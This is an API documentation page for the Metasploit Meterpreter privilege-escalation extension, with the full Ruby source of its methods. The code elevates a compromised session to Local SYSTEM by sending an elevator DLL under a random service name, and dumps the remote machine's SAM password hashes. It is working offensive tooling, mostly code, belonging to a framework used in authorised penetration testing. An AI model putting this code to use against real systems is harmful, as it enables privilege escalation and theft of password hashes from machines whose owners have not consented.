Class: Rex::Post::Meterpreter::Extensions::Priv::Priv

Inherits:
Rex::Post::Meterpreter::Extension
Defined in:
lib/rex/post/meterpreter/extensions/priv/priv.rb

Overview

This meterpreter extension provides a privilege escalation interface that is capable of doing things like dumping password hashes and performing local exploitation.

Instance Attribute Summary

Attributes inherited from Rex::Post::Meterpreter::Extension

#client, #name

Class Method Summary

Instance Method Summary

Constructor Details

#initialize(client) ⇒ Priv

Initializes the privilege escalation extension.


# File 'lib/rex/post/meterpreter/extensions/priv/priv.rb', line 30

# Sets up the 'priv' extension on the given client: registers the
# extension alias and builds the privileged file-system sub-interface.
#
# @param client [Rex::Post::Meterpreter::Client] the meterpreter client
#   this extension is attached to
def initialize(client)
  super(client, 'priv')

  alias_entry = {
    'name' => 'priv',
    'ext'  => self
  }
  client.register_extension_aliases([alias_entry])

  # Sub-interfaces exposed by this extension.
  self.fs = Fs.new(client)
end

Instance Attribute Details

#fs ⇒ Object

Modifying privileged file system attributes.


# File 'lib/rex/post/meterpreter/extensions/priv/priv.rb', line 123

# Sub-interface for modifying privileged file system attributes; it is
# created in #initialize as an instance of Fs.
#
# @return [Fs] the privileged file-system interface
def fs
  @fs
end

Class Method Details

.extension_id ⇒ Object


# File 'lib/rex/post/meterpreter/extensions/priv/priv.rb', line 23

class << self
  # Numeric identifier of this extension as known to the meterpreter
  # protocol.
  #
  # @return [Integer] the value of EXTENSION_ID_PRIV
  def extension_id
    EXTENSION_ID_PRIV
  end
end

Instance Method Details

#getsystem(technique = 0) ⇒ Object

Attempt to elevate the meterpreter to Local SYSTEM


# File 'lib/rex/post/meterpreter/extensions/priv/priv.rb', line 48

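# Attempts to elevate the meterpreter session to Local SYSTEM.
#
# @param technique [Integer] elevation technique to request from the remote
#   side; 0 asks it to try every technique, 3 is the token-duplication
#   technique. Both of these require the elevator DLL to be sent along.
# @return [Array(Boolean, Integer)] +[true, technique]+ on success, where
#   technique is the one the remote side reports having used, or
#   +[false, 0]+ when elevation failed.
# @raise [RuntimeError] if no elevator DLL exists for any of the client's
#   binary suffixes.
def getsystem(technique=0)
  request = Packet.create_request(COMMAND_ID_PRIV_ELEVATE_GETSYSTEM)

  # The elevator DLL is only needed for the token-duplication method, which
  # runs when that method is asked for explicitly (3) or when all
  # techniques are tried (0).
  if [0, 3].include?(technique)
    elevator_name = Rex::Text.rand_text_alpha_lower(6)
    elevator_data = load_elevator_dll

    request.add_tlv(TLV_TYPE_ELEVATE_SERVICE_NAME, elevator_name)
    request.add_tlv(TLV_TYPE_ELEVATE_SERVICE_DLL, elevator_data)
    request.add_tlv(TLV_TYPE_ELEVATE_SERVICE_LENGTH, elevator_data.length)
  end

  request.add_tlv(TLV_TYPE_ELEVATE_TECHNIQUE, technique)

  # Some service routines are slow, so allow 90 seconds for the response.
  response = client.send_request(request, 90)

  used_technique = response.get_tlv_value(TLV_TYPE_ELEVATE_TECHNIQUE)
  return [ false, 0 ] unless response.result == 0 && !used_technique.nil?

  # The session now runs under a different token; refresh what stdapi
  # reports about it.
  client.core.use('stdapi') unless client.ext.aliases.include?('stdapi')
  client.update_session_info
  client.sys.config.getprivs

  db = client.framework.db
  if db && db.active
    begin
      db.report_note(
        :host => client.sock.peerhost,
        :workspace => db.workspace,
        :type => 'meterpreter.getsystem',
        :data => { :technique => used_technique }
      )
    rescue StandardError
      # Recording the note is best effort: a database failure must not
      # turn a successful elevation into an error for the caller.
    end
  end

  [ true, used_technique ]
end

# Finds the elevator DLL shipped with metasploit-payloads for one of the
# client's binary suffixes and returns its contents.
#
# @return [String] the raw bytes of the elevator DLL
# @raise [RuntimeError] when no candidate file exists for any suffix
def load_elevator_dll
  # Stop at the first suffix that resolves to an existing path.
  elevator_path = client.binary_suffix.lazy
    .map { |s| MetasploitPayloads.meterpreter_path('elevator', s) }
    .find { |path| !path.nil? }

  if elevator_path.nil?
    candidates = client.binary_suffix.map { |s| "elevator.#{s}" }.join(', ')
    raise RuntimeError, "#{candidates} not found", caller
  end

  ::File.binread(elevator_path)
end
private :load_elevator_dll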

#sam_hashes ⇒ Object

Returns an array of SAM hashes from the remote machine.


# File 'lib/rex/post/meterpreter/extensions/priv/priv.rb', line 111

# Fetches the SAM hashes from the remote machine.
#
# @return [Array<SamUser>] one entry per line returned by the remote side
def sam_hashes
  request = Packet.create_request(COMMAND_ID_PRIV_PASSWD_GET_SAM_HASHES)

  # Large domain controllers can take a very long time to dump, so the
  # timeout is raised to one hour for this request.
  response = client.send_request(request, 3600)

  raw_hashes = response.get_tlv_value(TLV_TYPE_SAM_HASHES)
  raw_hashes.split(/\n/).map do |line|
    SamUser.new(line)
  end
end